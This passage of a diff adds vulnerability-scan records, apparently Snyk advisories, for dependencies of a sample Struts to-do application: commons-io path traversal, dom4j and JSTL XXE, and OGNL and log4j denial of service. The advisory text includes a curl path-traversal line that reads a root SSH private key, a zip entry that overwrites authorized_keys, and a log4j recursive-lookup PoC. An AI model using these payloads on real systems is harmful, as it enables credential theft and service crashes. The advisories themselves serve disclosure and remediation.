+ }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:20.715148Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:34.519777Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:56.345148Z" + } + ], + "description": "## Overview\n[commons-io:commons-io](https://search.maven.org/artifact/commons-io/commons-io) is a The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.\n\nAffected versions of this package are vulnerable to Directory Traversal via calling the method FileNameUtils.normalize using an improper string like `//../foo` or `\\\\..\\foo`, which may allow access to files in the parent directory.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `commons-io:commons-io` to version 2.7 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/commons-io/commit/fe7543eee5cd4b2f9e78aa44c31031b68eba204d)\n- [Jira Issue](https://issues.apache.org/jira/browse/IO-556)\n- [PoC](https://github.com/AlAIAL90/CVE-2021-29425)\n", + "epssDetails": { + "percentile": "0.54510", + "probability": "0.00171", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-29425" + ], + "CWE": [ + "CWE-20", + "CWE-22" + ], + "GHSA": [ + "GHSA-gwrp-pvrq-jmwv" + ] + }, + "packageName": "commons-io:commons-io", + "proprietary": false, + "creationTime": "2021-04-27T10:51:05.462338Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-04-26T16:04:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-io", + "artifactId": "commons-io" + }, + "publicationTime": "2021-04-27T14:26:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:56.345148Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-io:commons-io@2.2" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@6.0.0", + "commons-io:commons-io@2.9.0" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-io:commons-io", + "version": "2.2" + }, + { + "id": "SNYK-JAVA-DOM4J-174153", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "credit": [ + "Mario Areias" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/Namespace.java", + "className": "Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/QName.java", + "className": "QName", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/dom4j/dom4j/issues/48", + "title": "GitHub Issue" + }, + { + "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", + "title": "POC: Ihacktoprotect Blog" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:55.789489Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", + "epssDetails": { + "percentile": "0.70906", + "probability": "0.00325", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1000632" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-6pcc-3rfx-4gpm" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2019-04-10T16:07:04.634619Z", + "functions_new": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.QName", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-01T19:12:29Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2018-08-21T14:16:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.900402Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "dom4j:dom4j", + "version": "1.6.1" + }, + { + "id": "SNYK-JAVA-DOM4J-2812975", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/a822852", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:31.083245Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", + "epssDetails": { + "percentile": "0.79800", + "probability": "0.00664", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10683" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-hwj3-m3p6-hj38" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2022-05-10T12:56:27.582369Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-15T09:38:17Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2020-04-16T15:22:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.985080Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "dom4j:dom4j", + "version": "1.6.1" + }, + { + "id": "SNYK-JAVA-JAVAXSERVLET-30449", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "credit": [ + "David Jorm" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "javax.servlet:jstl", + "references": [ + { + "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", + "title": "Apache Mail Archive" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", + "title": "NVD" + }, + { + "url": "https://access.redhat.com/security/cve/CVE-2015-0254", + "title": "RedHat CVE Database" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "cvssV3BaseScore": 7.6, + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:43.270072Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "description": "## Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", + "epssDetails": { + "percentile": "0.94002", + "probability": "0.07046", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-0254" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-6x4w-8w53-xrvv" + ] + }, + "packageName": "javax.servlet:jstl", + "proprietary": false, + "creationTime": "2017-02-22T07:28:19.341000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-02-27T16:13:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "javax.servlet", + "artifactId": "jstl" + }, + "publicationTime": "2015-02-27T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.017447Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "javax.servlet:jstl", + "version": "1.2" + }, + { + "id": "SNYK-JAVA-OGNL-30474", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Tao Wang" + ], + "semver": { + "vulnerable": [ + "[,3.0.12)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.0.12" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "ognl:ognl", + "references": [ + { + "url": "https://github.com/jkuhnert/ognl/commit/ae43073fbf38db8371ff4f8bf2a966ee3b5f7e92", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:50.033229Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.218889Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:50.033229Z" + } + ], + "description": "## Overview\n[`ognl:ognl`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22ognl%22) is a simple Expression Language (EL) for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) attacks.\nApache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `ognl:ognl` to version 3.0.12 or higher.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093)\n- [GitHub Commit](https://github.com/jkuhnert/ognl/commit/ae43073fbf38db8371ff4f8bf2a966ee3b5f7e92)\n", + "epssDetails": { + "percentile": "0.90602", + "probability": "0.02732", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3093" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "ognl:ognl", + "proprietary": false, + "creationTime": "2017-02-22T07:28:19.659000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-02T02:16:48.918000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "ognl", + "artifactId": "ognl" + }, + "publicationTime": "2016-06-02T02:16:48.918000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:50.033229Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "ognl:ognl@3.0.6" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.28", + "ognl:ognl@3.0.13" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "ognl:ognl", + "version": "3.0.6" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Hideki Okamoto of Akamai Technologies" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.3)", + "[2.13.0,2.17.0)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.1", + "2.12.3", + "2.17.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3230", + "title": "JIRA Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:51:51.570474Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:58.516498Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:38.288854Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.570474Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.516498Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n", + "epssDetails": { + "percentile": "0.99624", + "probability": "0.96524", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-45105" + ], + "CWE": [ + "CWE-400" + 